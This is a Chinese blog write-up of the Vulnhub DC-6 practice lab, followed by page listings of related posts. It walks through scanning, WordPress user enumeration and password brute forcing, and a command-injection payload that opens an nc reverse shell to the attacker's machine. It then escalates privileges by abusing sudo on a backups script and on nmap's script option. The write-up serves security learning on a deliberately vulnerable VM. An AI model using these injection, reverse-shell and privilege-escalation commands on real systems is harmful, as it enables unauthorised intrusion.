Vulnhub:DC-6

于 2024-07-15 00:10:44 发布
阅读量181 收藏 2
点赞数 4
文章标签: 网络 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69670995/article/details/140425279
版权

1.环境搭建

靶机下载:https://www.vulnhub.com/entry/dc-6,315/

将靶机导入Oracle VM VirtualBox中,使用仅主机模式,网卡使用和kali相同的网卡

开启靶机

2.渗透过程

使用nmap进行主机发现扫描

nmap -sn 192.168.56.0/24

使用nmap进行端口扫描

nmap -sS 192.168.56.111

发现22和80端口,使用浏览器访问80端口

访问失败,修改/etc/hosts文件

vim /etc/hosts

修改后再进行访问,访问成功

使用dirb进行web目录扫描

dirb http://192.168.56.111

发现后台登录系统

查看网站指纹

这是一个wordpress的CMS框架,版本是5.1.1,使用wpscan工具爆破用户名

wpscan --url http://192.168.56.111 -e u

枚举出来五个用户名

admin
graham
sarah
mark
jens
将他们放到一个文件中

cat user.txt

使用wpscan爆破密码

wpscan --url http://wordy -U user.txt -P /usr/share/wordlists/rockyou.txt

爆破出用户名mark,密码helpdesk01,进行登录

登录成功,点击页面功能,发现一个命令执行漏洞

127.0.0.1;ls

使用nc进行监听端口

nc -lvp 6666

进行反弹shell

127.0.0.1;nc -e /bin/bash 192.168.56.102 6666

反弹shell成功

使用python切换模式

python -c "impport pty;pty.spawn('/bin/bash');"

在/home/mark/stuff下有一个文件,打开该文件

发现了graham用户的密码,切换用户

切换成功,使用sudo -l查看该用户的授权

sudo -l

发现可以执行bachups.sh文件,向文件中写入“/bin/bash”

echo "/bin/bash" > /home/jens/backups.sh

执行该文件

sudo -u jens /home/jens/backups.sh

成功切换到jens用户,使用sudo -l查看该用户的授权

sudo -l

发现可以执行nmap,将os.execute('/bin/bash')写入shell文件

echo "os.execute('/bin/bash')" > shell

写入失败,报错没有权限,切换到/home/jens下,再次写入

echo "os.execute('/bin/bash')" > shell

sudo nmap --script=shell

提权成功,查看flag

GJyt
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2445
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub:DC-6靶机
qq_63283137的博客
09-14 232
有个root权限执行的nmap,nmap--script 参数可以执行脚本,只需写入提权脚本到此文件,再执行。这个文件中写入/bin/bash命令,然后以jens用户身份运行就可以获取到jens的shell了。水平越权,ssh链接此用户,sudo -l查看可以使用其他shell执行的文件。这账号不是root权限,一般home有用户信息,找到文件中有一组账户密码。扫描wordpress中的存在的用户,并写入到user.txt文件中。页面登录成功,这账户没啥操作权限,发现wordpress的一个插件。
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 715
Vulnhub靶机:DC-1渗透详细过程
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4461
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub实战:DC-2
huangyongkang666的博客
04-25 2275
vulnhub实战:DC-2 1.DC-2介绍 描述 与DC-1非常相似,DC-2是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 与原始DC-1一样,它在设计时考虑了初学者的需求。 Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个标志。 同样,就像DC-1一样,标志对初学者很重要,但对那些有经验的人来说并不那么重要。 简而言之,唯一真正重要的标志是最后一面旗帜。 对于初学者来说,谷歌是你的朋友。好吧
Vulnhub:DC-6靶机
qq_43884092的博客
04-01 236
访问目标80端口发现重定向到http://wordy,修改/etc/hosts之后访问,使用wpscan爆破目标用户,爆破用的密码字典根据作者提示可以进行筛选,在/home/mark/stuff/things-to-do.txt提示用户信息:graham|GSo7isUM1D4,nmap提权
Vulnhub靶机:DC-5
Innocence_0的博客
09-11 170
下载环境导入靶机,在kali里面扫描靶机ip地址靶机IP:192.168.190.133扫描端口:开放了两个tcp端口,我们访问一下ip在下载靶机的时候说明了只有一个flag,我们在页面试试,发现contact页面评论后会出现thankyou.php而且每次刷新下方的显示不同,扫描一下后台访问footer.php同样是每次刷新后内容不同,那猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含。
Vulnhub - DC-1
qq_46081990的博客
03-14 367
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2488
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
从零开始做题:logtime
weixin_44626085的博客
07-10 250
给出1个pcapng文件。
hmallox勒索病毒科普:了解其威胁与防御策略
最新发布
safe130_的博客
07-14 481
halo,.360,.faust,.2700, .eking,elbie, .wis,.mkp,.malox,.rmallox,.mallox,.hmallox, .anony, .ma1x0,.live,.carver,.locked,_locked,.locked1,.svh , lockbit, .src, .secret , .datah, .BEAST,.DevicData-P, .kat6.l6st6r 等等,:用户从非官方或不受信任的源下载软件时,可能会无意中安装带有勒索病毒的软件包。
vue2 实现原生 WebSocket
weixin_38797742的博客
07-11 375
原生WebSocket: new WebSocket。
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 666
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值